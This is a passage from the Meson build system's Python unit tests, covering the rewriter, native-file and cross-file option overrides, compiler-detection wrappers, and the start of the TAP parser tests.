'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
if isinstance(v, (bool, int, float)):
f.write("{}={}\n".format(k, v))
elif isinstance(v, list):
f.write("{}=[{}]\n".format(k, ', '.join(["'{}'".format(w) for w in v])))
else:
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('No llvm-installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
# We not have python2, check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so lets not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
def test_user_options(self):
testcase = os.path.join(self.common_test_dir, '43 options')
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_user_options_command_line_overrides(self):
testcase = os.path.join(self.common_test_dir, '43 options')
config = self.helper_create_native_file({'project options': {'other_one': True}})
self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false'])
def test_user_options_subproject(self):
testcase = os.path.join(self.unit_test_dir, '79 user options for subproject')
s = os.path.join(testcase, 'subprojects')
if not os.path.exists(s):
os.mkdir(s)
s = os.path.join(s, 'sub')
if not os.path.exists(s):
sub = os.path.join(self.common_test_dir, '43 options')
shutil.copytree(sub, s)
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'sub:project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_option_bool(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'werror': True}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'werror' in each['name']:
self.assertEqual(each['value'], True)
break
else:
self.fail('Did not find werror in build options?')
def test_option_integer(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'unity_size': 100}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'unity_size' in each['name']:
self.assertEqual(each['value'], 100)
break
else:
self.fail('Did not find unity_size in build options?')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('Did not find werror in build options?')
def test_builtin_options_env_overrides_conf(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'pkg_config_path': '/foo'}})
self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'})
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/bar'])
break
else:
self.fail('Did not find pkg_config_path in build options?')
def test_builtin_options_subprojects(self):
testcase = os.path.join(self.common_test_dir, '102 subproject subdir')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
# Test that no-per subproject options are inherited from the parent
if 'c_args' in each['name']:
# This path will be hit twice, once for build and once for host,
self.assertEqual(each['value'], ['-Dfoo'])
found += 1
elif each['name'] == 'default_library':
self.assertEqual(each['value'], 'both')
found += 1
elif each['name'] == 'sub:default_library':
self.assertEqual(each['value'], 'static')
found += 1
self.assertEqual(found, 4, 'Did not find all three sections')
def test_builtin_options_subprojects_overrides_buildfiles(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '230 persubproject options')
config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertIn(cm.exception.stdout, 'Parent should override default_library')
def test_builtin_options_subprojects_inherits_parent_override(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '230 persubproject options')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertIn(cm.exception.stdout, 'Parent should override default_library')
def test_builtin_options_compiler_properties(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'c_args': ['-DFOO']},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DFOO'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_compiler_properties_legacy(self):
# The legacy placement in properties is still valid if a 'built-in
# options' setting is present, but doesn't have the lang_args
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DBAR'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_paths(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'bindir': 'foo'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'foo')
break
else:
self.fail('Did not find bindir in build options?')
def test_builtin_options_paths_legacy(self):
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'bar')
break
else:
self.fail('Did not find bindir in build options?')
def test_builtin_options_paths_legacy(self):
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'bar')
break
else:
self.fail('Did not find bindir in build options?')
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def setUp(self):
super().setUp()
self.current_config = 0
self.current_wrapper = 0
def _cross_file_generator(self, *, needs_exe_wrapper: bool = False,
exe_wrapper: T.Optional[T.List[str]] = None) -> str:
if is_windows():
raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
return textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
{}
[properties]
needs_exe_wrapper = {}
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc,
'exe_wrapper = {}'.format(str(exe_wrapper)) if exe_wrapper is not None else '',
needs_exe_wrapper))
def _stub_exe_wrapper(self) -> str:
return textwrap.dedent('''\
#!/usr/bin/env python3
import subprocess
import sys
sys.exit(subprocess.run(sys.argv[1:]).returncode)
''')
def test_needs_exe_wrapper_true(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
def test_needs_exe_wrapper_false(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=False))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertNotRegex(out, r'Skipped:\s*1\n')
def test_needs_exe_wrapper_true_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
s = Path(d) / 'wrapper.py'
with s.open('wt') as f:
f.write(self._stub_exe_wrapper())
s.chmod(0o774)
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(
needs_exe_wrapper=True,
exe_wrapper=[str(s)]))
self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true'])
out = self.run_target('test')
self.assertRegex(out, r'Ok:\s*3\s*\n')
def test_cross_exe_passed_no_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
self.build()
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
# The test uses mocking and thus requires that the current process is the
# one to run the Meson steps. If we are using an external test executable
# (most commonly in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = self._cross_file_generator()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, os mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def helper_create_cross_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_user_options(self):
# This is just a touch test for cross file, since the implementation
# shares code after loading from the files
testcase = os.path.join(self.common_test_dir, '43 options')
config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--cross-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--cross-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('No c++ standard set?')
def test_builtin_options_per_machine(self):
"""Test options that are allowed to be set on a per-machine basis.
Such options could be passed twice, once for the build machine, and
once for the host machine. I've picked pkg-config path, but any would
do that can be set for both.
"""
testcase = os.path.join(self.common_test_dir, '2 cpp')
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}})
native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}})
# Ensure that PKG_CONFIG_PATH is not set in the environment
with mock.patch.dict('os.environ'):
for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']:
try:
del os.environ[k]
except KeyError:
pass
self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross/path'])
found += 1
elif each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++17')
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native/path'])
found += 1
elif each['name'] == 'build.cpp_std':
self.assertEqual(each['value'], 'c++14')
found += 1
if found == 4:
break
self.assertEqual(found, 4, 'Did not find all sections.')
def test_builtin_options_env_overrides_conf(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/foo'}})
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/foo'}})
self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross],
override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'})
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/bar'])
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/dir'])
found += 1
if found == 2:
break
self.assertEqual(found, 2, 'Did not find all sections.')
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
